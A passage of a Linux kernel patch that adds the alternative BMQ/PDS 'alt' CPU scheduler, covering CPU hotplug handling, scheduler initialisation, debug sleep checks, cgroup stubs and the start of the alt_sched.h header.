++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPUs hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do sync before park smpboot threads to take care the rcu boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do it's job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take chance to reset time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++
++static int __init migration_init(void)
++{
++	sched_cpu_starting(smp_processor_id());
++	return 0;
++}
++early_initcall(migration_init);
++
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->prio = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++
++		zalloc_cpumask_var_node(&rq->scratch_mask, GFP_KERNEL, cpu_to_node(i));
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPU's synchronised, and interrupts disabled, the
++ * and caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_files,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..0b563999d4c1
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,671 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/profile.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetics problems.
++ * A weight of a cfs_rq is the sum of weights of which entities
++ * are queued on this cfs_rq, so a weight of a entity should not be
++ * too large, so as the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
